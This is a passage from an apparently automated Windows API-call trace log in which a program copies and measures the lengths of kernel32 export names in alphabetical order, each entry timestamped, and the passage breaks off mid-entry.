lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.574] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.574] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.575] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.576] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.576] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.576] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.576] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.576] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.576] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.576] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.576] lstrlenA (lpString="BEEP") returned 4 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.576] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.576] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.577] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.577] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.577] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.577] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.577] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.577] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.577] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.577] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.577] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.577] lstrlenA (lpString="CANCELIO") returned 8 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.577] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.577] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.577] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.577] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.577] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.577] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.577] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.577] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.577] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.577] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.578] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.578] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.578] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.578] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.578] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.578] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.578] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.578] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.578] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.578] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.578] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.578] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.578] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.578] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.578] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.578] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.578] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.578] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.578] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.578] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.579] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.579] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.579] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.579] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.579] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.579] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.579] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.579] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.579] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.579] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.579] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.579] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.579] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.579] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.579] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.579] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.579] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.579] lstrlenA (lpString="COPYFILEA") returned 9 [0087.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.580] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.580] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.580] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.580] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.580] lstrlenA (lpString="COPYFILEW") returned 9 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.580] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.580] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.580] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.580] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.580] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.580] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.580] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.580] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.580] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.580] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.580] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.580] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.580] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.580] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.580] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.581] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.581] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.581] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.581] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.581] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.581] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.581] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.581] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.581] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.581] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.581] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.581] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.581] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.581] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.581] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.581] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.581] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.581] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.581] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.582] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.582] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.582] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.582] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.582] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.582] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.582] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.582] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.582] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.582] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.582] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.582] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.582] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.582] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.582] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.582] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.582] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.582] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.582] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.583] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: 